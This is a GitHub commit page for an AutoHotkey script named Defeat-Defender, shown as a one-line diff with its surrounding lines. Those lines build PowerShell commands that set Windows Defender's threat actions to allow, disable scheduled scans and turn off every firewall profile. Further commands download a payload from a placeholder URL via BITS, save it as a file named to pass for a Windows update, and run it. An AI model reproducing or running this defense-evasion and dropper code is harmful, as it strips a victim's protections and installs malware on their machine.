Skip to content

Commit

Permalink
Update Defeat-Defender-V1.3.ahk
Browse files Browse the repository at this point in the history
  • Loading branch information
swagkarna authored Sep 13, 2021
1 parent ab3ab27 commit fb285c7
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion Defeat-Defender[AHK]/Defeat-Defender-V1.3.ahk
Original file line number Diff line number Diff line change
Expand Up @@ -33,7 +33,7 @@ k:="powershell.exe -command ""Set-MpPreference -ModerateThreatDefaultAction 6""`
l:="powershell.exe -command ""Set-MpPreference -LowThreatDefaultAction 6""`n"
m:="powershell.exe -command ""Set-MpPreference -SevereThreatDefaultAction 6""`n"
n:="powershell.exe -command ""Set-MpPreference -ScanScheduleDay 8""`n"
o:="powershell.exe -command ""netsh advfirewall set allprofiles state off"""
o:="powershell.exe -command ""netsh advfirewall set allprofiles state off""`n"
ff:="powershell -command start-bitstransfer https://directurl-to-your-payload .\Winupdate.exe `n"
gg:="timeout 3 `n"
hh:="start Winupdate.exe"
Expand Down

0 comments on commit fb285c7

Please sign in to comment.